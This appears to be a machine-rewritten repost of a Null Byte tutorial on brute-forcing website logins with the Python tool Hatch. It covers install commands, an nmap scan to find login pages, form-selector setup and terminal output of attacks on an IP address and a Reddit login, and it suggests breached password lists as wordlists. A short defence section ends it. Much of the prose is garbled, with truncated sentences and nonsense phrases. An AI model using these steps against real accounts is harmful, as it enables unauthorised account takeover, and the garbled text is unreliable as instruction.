قالب وردپرس درنا توس
Home / Tips and Tricks / How to Brute-Force Nearly Any Website Login with Hatch «Null Bytes :: WonderHowTo

How to Brute-Force Nearly Any Website Login with Hatch «Null Bytes :: WonderHowTo



The tactic of brute-forcing a login, i.e., trying many passwords Very fast until the correct one is discovered, can be easy for services like SSH or Telnet. For a website login page, we must identify different elements of the page first.

How Brute-Force Attacks Work

Brute-force attacks take advantage of automation to try many more passwords than a human could. More targeted brute-force attacks using a technique to check for weak passwords is often the first attack a hacker wants to try against a system.

In a brute-forcing attack against a service like SSH, it can be used directly from tools like Sshtrix. SSH server using the built-in password list, making services with bad passwords very likely to be broken in to.

The biggest downside to a brute-force attack is the password does not exist in the password list, the attack will fail. Brute-force attacks can quickly become too expensive in time and resources to use. Another downside is that many services fail to do so, which can only slow down a brute-force attack.

Why Brute-Force Attacks Are Harder on Websites

While it's easy to take a service that takes a username and password over the command line, there is a lot more going on in the code of a website. To design this attack, we need to think about what the script needs to know to do its job.

Submitting it until we get a successful result.

After we do this, we need to submit the guess by clicking on the on the right side of the page "Login" button on the page. Finally, we need to know the difference between a failure and a success, so we can stop the script and identify the correct password guess.

All this is a lot more work and quite confusing for beginners, but after SSH service.

Hatch for Brute-Forcing Web Logins

Python is an ideal language for automating Python2 to automate the Chrome web browser to stage a brute force attack against the login of any webpage with a visible login forum.

Upon launching Hatch, the script opens a Chrome window for you to inspect the elements of the page you are targeting. After telling the script what site you want to brute-force a login to, it will check to see if it exists and is accessible. If it is, Hatch wants to ask what you want to do, and then request a list of passwords to try during the attack.

begin automating the attack. You can sit back and watch the attack unfold either in the Chrome window or the terminal that is running the attack. In the terminal, you can watch each password attempt as the script progresses down the list.

What You'll Need

While Hatch is Cross-Bordering platform, it was a little complicated to set up on some systems.

To follow this guide, you'll need a Windows system with Chrome and Python 2 installed. The current version of Python is Python3, so you'll need to use the right version when you execute the script. If you run Hatch with Python3, it will not work properly.

You'll need to install a few dependencies programmatically.

Step 1: Check Your Version of Python

First, we'll need to install a few dependencies. To take care of these, press the Windows key or click the Start menu, then type cmd . Promptly, make sure you have Python2 installed correctly by typing python2 into the terminal window.

If you do not, you can download Python2. Once your Python2 is installed, type the following commands to install dependencies.

 pip2 install selenium
pip2 install requests 

Step 2: Install the Chrome Driver

Next, we'll need to install the Chrome driver from the Python program. To do this, we want to download a file from the Chrome Driver website, and then create a folder called webdrivers on your C drive. Move the downloaded file into this folder. Python code

Step 3: Download Hatch & Install

To install Hatch, you can change directory to your C drive before cloning it to make sure you can find it, or change to another location that you'll be able to find. Type cd .. to go to the drive of your computer, if that's where you want.

 git clone https://github.com/nsgodshall/Hatch.git

This forked version. [1969090] git clone https://github.com/nsgodshall/Hatch.git

This forked version has been modified to work on Windows. cd Hatch to change directories into the download folder.

Step 4: Run Hatch & Select Your Router Login

Now that we have Hatch on our system and all of the dependencies installed, it's time to run. Hatch and look at the way it works.

 python2 main.py -h 

 C:  Users  Nick  Documents  PythonScripts  Hatch (master -> origin)
λ python2 main.py -h
Usage: main.py [optoiins]

Options:
  -h, --help show this help message and exit
  -u USERNAME, --username = USERNAME Choose the username
  --usernamesel + USERNAMESEL Choose the username selector
  --passsel = PASSSEL Choose the password selector
  --loginsel = LOGINSEL Choose the login button selector
  --passlist + PASSLIST Enter the password list directory
  --website = WEBSITE choose a website 

We can see the main options for Hatch here.

A good device on your local network to test this on a network. You can select this by running Nmap on the network to find any IP addresses that have port 80 open. While port 80 is the most common page for web access, you can also search for ports 81, 8080, 8081, 443 to locate the login pages of various devices.

Next, we'll need to find the subnet range so that we can scan the local network. To find this, you can use ipcalc to calculate your subnet range after finding your computer's local IP address. IP address on 192.168.0.3, you can run ipcalc 192.168.0.3 to get the IP range for all possible IP addresses on that network. In this case, that would be 192.168.0.0/24.

Once you know the range, follow the following path. iprange section changed to the IP range of your network .

 sudo nmap -p 80,8080,81,8081,443 iprange 

When this scan returns, any service that lists the port as "open" should be hosting a website. Navigate to one as you would like it to be in the Nmap. ” width=”532″ height=”532″ style=”max-width:532px;height:auto;”/>

Step 5: Identify the Login Elements

Now, we can run Hatch, but we'll still need some more information in order to pull off this attack.

 python2 main.py 

A Google Chrome window should open, allowing us to navigate to a website we want to attack and begin

 C:  Users  Nick  Documents  PythonScripts  Hatch (master -> origin)
λ python2 main.py -h

DevTools listening on ws: //127.0.0.1: 6735 / devtools / browser / 24db43f7-d0d7-4756-8a2c-94676e65bb8f

  _ _ _ _
 | | | | | | | |
 | | __ | | ___ | | _ ___ | | __
 | __ | / _` | __ / __ | '_ 
 | | | | (_ | | || (__ | | | |
 | _ | | _ |  __, _ |  __  ___ | _ | | _ |
  [-] -> V.1.0
  [-] -> coded by Metachar
  [-] -> brute-force tool

[~] Enter a website: 

Enter the URL to the target site's login page into the first prompt from Hatch. It wants to check and make sure the website exists and can be accessed.

On our target login page, right-click on the "Username" element, then click on "Inspect."

Next, click on the ellipsis (•••) to the left of the window, and a drop-down menu will appear. Click on "Copy," and then "Copy selector" to copy what Hatch wants to select and interact with this element. It should look something like "#username."

Enter the username selector into Hatch, and then repeat the process with the "Password" selector.

 C :  Users  Nick  Documents  PythonScripts  Hatch (master -> origin)
λ python2 main.py -h

DevTools listening on ws: //127.0.0.1: 6735 / devtools / browser / 24db43f7-d0d7-4756-8a2c-94676e65bb8f

  _ _ _ _
 | | | | | | | |
 | | __ | | ___ | | _ ___ | | __
 | __ | / _` | __ / __ | '_ 
 | | | | (_ | | || (__ | | | |
 | _ | | _ |  __, _ |  __  ___ | _ | | _ |
  [-] -> V.1.0
  [-] -> coded by Metachar
  [-] -> brute-force tool

[~] Enter a website: http://202.216.246.99/
[!] Checking if site exists [OK]
[~]  Enter the username selector: # username
[~] Enter the password selector: #passwd
[~] Enter the login button selector: 

Finally, right-click on the "Login" button to get the selector information, and add that to Hatch as well.

Now that we've selected the elements, we ' I'll set the username that we're trying to brute-force. In this case, we'll just type admin . The final step will be to select the default list that comes with Hatch. This is "passlist.txt" by default.

 C:  Users  Nick  Documents  PythonScripts  Hatch (master -> origin)
λ python2 main.py -h

DevTools listening on ws: //127.0.0.1: 6735 / devtools / browser / 24db43f7-d0d7-4756-8a2c-94676e65bb8f

  _ _ _ _
 | | | | | | | |
 | | __ | | ___ | | _ ___ | | __
 | __ | / _` | __ / __ | '_ 
 | | | | (_ | | || (__ | | | |
 | _ | | _ |  __, _ |  __  ___ | _ | | _ |
  [-] -> V.1.0
  [-] -> coded by Metachar
  [-] -> brute-force tool

[~] Enter a website: http://202.216.246.99/
[!] Checking if site exists [OK]
[~]  Enter the username selector: # username
[~] Enter the password selector: #passwd
[~] Enter the Login button selector: #login_ok
[~] Enter the username to brute-force: admin
[~] Enter a directory to a password list: passlist.txt

DevTools listerning on ws: //127.0.0.1: 7827 / devtools / browser / 0d90faa9-4f25-41a6-bd30-444cdff7705d

DevTools listerning on ws: //127.0.0.1: 7848 / devtools / browser / 33d370d5-46db-4d56-b5f4-a78554e07316 

This password list is not huge, but it does contain many common passwords. Press return and Hatch wants to open a new window to begin brute-forcing the password. Hatch is automating.

 C:  Users  Nick  Documents  PythonScripts  Hatch (master -> origin)
λ python2 main.py -h

DevTools listening on ws: //127.0.0.1: 6735 / devtools / browser / 24db43f7-d0d7-4756-8a2c-94676e65bb8f

  _ _ _ _
 | | | | | | | |
 | | __ | | ___ | | _ ___ | | __
 | __ | / _` | __ / __ | '_ 
 | | | | (_ | | || (__ | | | |
 | _ | | _ |  __, _ |  __  ___ | _ | | _ |
  [-] -> V.1.0
  [-] -> coded by Metachar
  [-] -> brute-force tool

[~] Enter a website: http://202.216.246.99/
[!] Checking if site exists [OK]
[~]  Enter the username selector: # username
[~] Enter the password selector: #passwd
[~] Enter the Login button selector: #login_ok
[~] Enter the username to brute-force: admin
[~] Enter a directory to a password list: passlist.txt

DevTools listerning on ws: //127.0.0.1: 7827 / devtools / browser / 0d90faa9-4f25-41a6-bd30-444cdff7705d

DevTools listerning on ws: //127.0.0.1: 7848 / devtools / browser / 33d370d5-46db-4d56-b5f4-a78554e07316
------------------------
Tried password: 123456
for user: admin
------------------------
------------------------
Tried password: password
for user: admin
------------------------
------------------------
Tried password: qwerty
for user: admin
------------------------
------------------------
Tried password: Hackthis1
for user: admin 

Step 6: Update Your Wordlist & Run Against an External Website

If you're not happy with the wordlist included in Hatch, you can add it to a text editor like Nano or adding another wordlist any repository of wordlists, such as those leaked from data breaches. After downloading a wordlist of your choice, you can add it to the "Hatch" folder, and select it instead of the default list.

Once you've got a password, you're happy with it a common website. Create a throwaway account on Reddit.com or another site, and remember the login name.

After the dummy account is set up, run Hatch again and enter reddit.com/login (or the login page for the website you chose). Next, paste the selectors into the login, password, and button selector. Finally, enter the target username, and select the password containing the right credentials. Press return and the script should open a Chrome window and begin automating the attack.

Once the script detects a successful login, it will output the password that succeeded. Windows, my friend Nick modified the code to prevent this from happening in his forked version. If you get any weirdness from the forked version, you can always try the original Hatch version.

 ⠀⠀_ _ _ _
 | | | | | | | |
 | | __ | | ___ | | _ ___ | | __
 | __ | / _` | __ / __ | '_ 
 | | | | (_ | | || (__ | | | |
 | _ | | _ |  __, _ |  __  ___ | _ | | _ |
  [-] -> V.1.0
  [-] -> coded by Metachar
  [-] -> brute-force tool

[~] Enter a website: http://www.reddit.com/login
[!] Checking if site exists [~] Enter the username selector: #loginUsername
[~] Enter the password selector: #loginPassword
[~] Enter the Login button selector: body> div> div> div.PageColumn.PageColumn__right> div> form> fieldset: nth-child (10)> button
[~] Enter the username to brute-force: hackthisaccountNB
[~] Enter a directory to a password list: passlist.txt

DevTools listerning on ws: //127.0.0.1: 11301 / devtools / browser / 6fd2f19e-9fef-4921-863f-d3316ec3b808

DevTools listerning on ws: //127.0.0.1: 11318 / devtools / browser / f8d672c9-8e46-477c-a93d-baf0ea6b50e1
------------------------
Tried password: 123456
for user: hackthisaccountNB
------------------------
------------------------
Tried password: password
for user: hackthisaccountNB
------------------------
------------------------
Tried password: qwerty
for user: hackthisaccountNB
------------------------
THIS COULD MEAN 2 THINGS THE PASSWORD WHAT FOUND OR YOU HAVE BEEN LOCKED OUT OF ATTEMPTS!
LAST PASS ATTEMPT BELOW
Password has been found: qwerty

Have fun:) 

How to Defend Against Brute-Forcing

Sites have the best ability to defend against these attacks by establishing common sense brute-forcing safeguards. Should a normal user be able to log in with the wrong password?

On the user side, picking strong, random passwords and save them in a password manager can help make sure your password never ends up in a brute-forcing list. In general, using two-factor authentication whenever possible is your best defense against these sorts of tactics, as you'll be alerted to the login attempt. For important accounts, you should always have two-factor authentication enabled.

Hatch for automating brute-force attacks against web logins! Twitter @KodyKinzie

Do not miss : Use Leaked Password Databases to Create Brute-Force Wordlists

Cover photo and screenshots by Kody / Null Byte




Source link